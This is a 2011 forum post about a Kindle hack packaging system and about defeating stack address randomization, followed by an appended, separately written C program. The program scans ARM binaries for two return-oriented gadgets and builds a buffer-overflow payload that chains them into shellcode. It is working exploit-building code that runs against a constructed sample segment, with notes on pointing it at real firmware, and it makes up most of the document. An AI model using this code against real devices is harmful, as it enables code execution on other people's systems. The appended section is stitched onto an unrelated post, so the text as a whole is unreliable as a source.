Old 11-22-2011, 07:43 AM   #99
yifanlu
Kindle Dissector
 
Posts: 662
Karma: 475607
Join Date: Jul 2010
Device: Amazon Kindle 3
Quote:
Originally Posted by dsmid View Post
Some time ago I was thinking about the same thing.
My conclusion was almost the same as yours, with a few differences.
I'd like to have two more hooks: install.sh and uninstall.sh.
Many hacks need to write to the root partition when installed (besides installing a SysV service script); install.sh would offer an install-time executed shell script,
uninstall.sh would be copied to a secure place when the package is installed (renamed to /opt/packages/<package name>) and run when deletion of /mnt/us/packages/<package name>/ is detected.
On each start the packaging system service would compare the /opt/packages/ contents with /mnt/us/packages/ and run the install script (a new kid on the block) or the renamed uninstall script (package deleted on US).

Copying to /opt/packages/ may appear as an unnecessary abuse of the root partition but it makes sense.
Users often try to solve their problems with hacks by doing a factory reset, hoping it will roll back all changes made to their Kindle. That makes the situation even worse, leaving the hacks in an inconsistent state (a true support nightmare).

If the package registry is protected from factory reset, the packaging system would be able to finish the uninstallation procedure of all hacks and make the Kindle clean of all hacks as desired (with the exception of the packaging system/jailbreak).
Could you give an example of rootfs usage other than copying an init script? I would rather manually implement anything that requires access to rootfs than let all scripts modify it. That's one of the main problems I have: after a while, I don't know which files on the FS are modified. Especially since I lost the uninstaller scripts.

Quote:
Originally Posted by Lorphos View Post
randomize_va_space picks one of only 8192 locations. Perhaps it can still be defeated? A format-string bug would be the ticket.
I was thinking something along the lines of 1) push the location of an instruction that copies the SP pointer to another register and pops the stack into PC, and 2) push the location of an instruction that jumps to said register. Then, when the overflow runs, it does two jumps.

Last edited by yifanlu; 11-22-2011 at 07:46 AM.
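As an added example (not code from this thread, the Kindle hacks it discusses, or any real binary), the C program below scans a little-endian, ARM-mode text segment for the two gadgets sketched in the post above, "mov rX, sp; pop {..., pc}" and "bx rX" (or "blx rX"), and lays out the overflow payload that chains them. Everything it assumes is labelled: the instruction encodings are from the ARM architecture manual, the sample text words and the 0x8000 base address are constructed, the victim function is taken to return through its own "pop {..., pc}", gadgets are word-aligned ARM (Thumb is not searched, and a "bx" to a word-aligned stack address stays in ARM mode). Two caveats a practitioner would want: this chain removes the need to guess the randomized stack address, but the two gadget addresses themselves still have to be fixed (a non-PIE executable, or a library that ASLR does not move), and the stack must be executable for the final jump to land in shellcode. A detail the sketch leaves open is also handled: rX ends up pointing at the first word gadget 1 pops, so gadget 1 must pop at least one register before pc, and that word is used as a branch over the junk and the gadget-2 pointer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed example, not code from the thread. ARM-mode (32-bit, little-endian)
 * encodings, from the ARM architecture manual:
 *   mov rX, sp        0xE1A0000D | (X << 12)
 *   pop {..., pc}     0xE8BD8000 | reglist      (ldmia sp!, {..., pc})
 *   bx  rX            0xE12FFF10 | X
 *   blx rX            0xE12FFF30 | X
 *   b   .+8+4*imm24   0xEA000000 | imm24 */
#define MOV_RX_SP_MASK 0xFFFF0FFFu
#define MOV_RX_SP_VAL  0xE1A0000Du
#define POP_PC_MASK    0xFFFF8000u
#define POP_PC_VAL     0xE8BD8000u
#define BX_RX_MASK     0xFFFFFFF0u
#define BX_RX_VAL      0xE12FFF10u
#define BLX_RX_VAL     0xE12FFF30u

struct chain {
    uint32_t g1;  /* address of "mov rX, sp" (next word is "pop {..., pc}") */
    uint32_t g2;  /* address of "bx rX" or "blx rX" */
    int reg;      /* X: register that receives the SP copy */
    int npop;     /* registers popped before pc by gadget 1 */
};

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static int popcount(uint32_t x) { int n = 0; for (; x; x >>= 1) n += (int)(x & 1); return n; }

/* Scan a word-aligned ARM text segment mapped at `base` for a usable pair
 * "mov rX, sp; pop {..., pc}" and "bx/blx rX". Returns 1 when found. */
int find_chain(const uint8_t *text, size_t len, uint32_t base, struct chain *out)
{
    for (size_t i = 0; i + 8 <= len; i += 4) {
        uint32_t w0 = le32(text + i), w1 = le32(text + i + 4);
        if ((w0 & MOV_RX_SP_MASK) != MOV_RX_SP_VAL || (w1 & POP_PC_MASK) != POP_PC_VAL)
            continue;
        int reg = (int)((w0 >> 12) & 0xF);
        uint32_t popped = w1 & 0x7FFFu;        /* registers other than pc */
        if (reg == 13 || reg == 15) continue;  /* mov sp,sp / mov pc,sp are useless here */
        if (popped & (1u << reg)) continue;    /* the pop would overwrite the SP copy */
        if (popped == 0) continue;             /* rX points at the first popped word; need one */
        for (size_t j = 0; j + 4 <= len; j += 4) {
            uint32_t w = le32(text + j);
            int is_bx = (w & BX_RX_MASK) == BX_RX_VAL || (w & BX_RX_MASK) == BLX_RX_VAL;
            if (is_bx && (int)(w & 0xF) == reg) {
                out->g1 = base + (uint32_t)i;  out->g2 = base + (uint32_t)j;
                out->reg = reg;                out->npop = popcount(popped);
                return 1;
            }
        }
    }
    return 0;
}

/* Bytes that replace the victim's saved LR and everything above it:
 *   [G1][b over][junk x (npop-1)][G2][shellcode]
 * The victim's "pop {..., pc}" leaves SP at the word after G1; gadget 1 copies
 * that into rX, pops npop words, then pops G2 into pc; gadget 2 jumps to rX,
 * whose first word is a branch over the junk and the G2 pointer into the code.
 * Returns bytes written, 0 if the chain or the buffer is unusable. */
size_t build_payload(const struct chain *c, const uint8_t *shellcode, size_t sc_len,
                     uint8_t *out, size_t out_len)
{
    size_t need = (size_t)(2 + c->npop) * 4 + sc_len;
    if (c->npop < 1 || out_len < need) return 0;
    uint8_t *p = out;
    put_le32(p, c->g1); p += 4;
    /* b target = pc + 8 + 4*imm24; skipping npop-1 junk words plus G2 needs imm24 = npop-1 */
    put_le32(p, 0xEA000000u | (uint32_t)(c->npop - 1)); p += 4;
    for (int k = 1; k < c->npop; k++) { put_le32(p, 0x41414141u); p += 4; }
    put_le32(p, c->g2); p += 4;
    memcpy(p, shellcode, sc_len);
    return need;
}

/* Constructed text segment (not from any real binary), assumed mapped at 0x8000. */
static const uint32_t sample_words[] = {
    0xE92D4010u, /* push {r4, lr}                                   */
    0xE1A0400Du, /* mov r4, sp    <- rejected: next pop clobbers r4  */
    0xE8BD8010u, /* pop {r4, pc}                                    */
    0xE1A0000Du, /* mov r0, sp    <- gadget 1 at 0x800C, npop = 2    */
    0xE8BD8030u, /* pop {r4, r5, pc}                                */
    0xE12FFF1Eu, /* bx lr         <- wrong register                  */
    0xE12FFF10u, /* bx r0         <- gadget 2 at 0x8018              */
};

int demo_chain(struct chain *c)
{
    uint8_t text[sizeof sample_words];
    for (size_t i = 0; i < sizeof sample_words / 4; i++) put_le32(text + 4 * i, sample_words[i]);
    return find_chain(text, sizeof text, 0x8000u, c);
}

size_t demo_payload(uint8_t *out, size_t out_len)
{
    /* two "mov r0, r0" words stand in for shellcode (placeholder, not a real payload) */
    static const uint8_t nops[8] = { 0x00, 0x00, 0xA0, 0xE1, 0x00, 0x00, 0xA0, 0xE1 };
    struct chain c;
    if (!demo_chain(&c)) return 0;
    return build_payload(&c, nops, sizeof nops, out, out_len);
}

int main(void)
{
    struct chain c; uint8_t buf[64];
    if (!demo_chain(&c)) { puts("no usable gadget pair"); return 1; }
    printf("gadget1 %08x (mov r%d, sp; pops %d regs + pc), gadget2 %08x\n",
           (unsigned)c.g1, c.reg, c.npop, (unsigned)c.g2);
    size_t n = demo_payload(buf, sizeof buf);
    for (size_t i = 0; i < n; i += 4) printf("  +%02zu: %08x\n", i, (unsigned)le32(buf + i));
    return 0;
}
```

Run against a real firmware binary, `find_chain` would be pointed at the bytes of the executable's text section with its load address as `base`; the constructed segment above exists only to show the three filters at work (a candidate whose pop clobbers rX, a `bx` on the wrong register, and the accepted pair). Because the first gadget's `pop` needs two popped registers here, the branch word becomes `b .+12` (imm24 = 1) so that it steps over one junk word and the gadget-2 pointer.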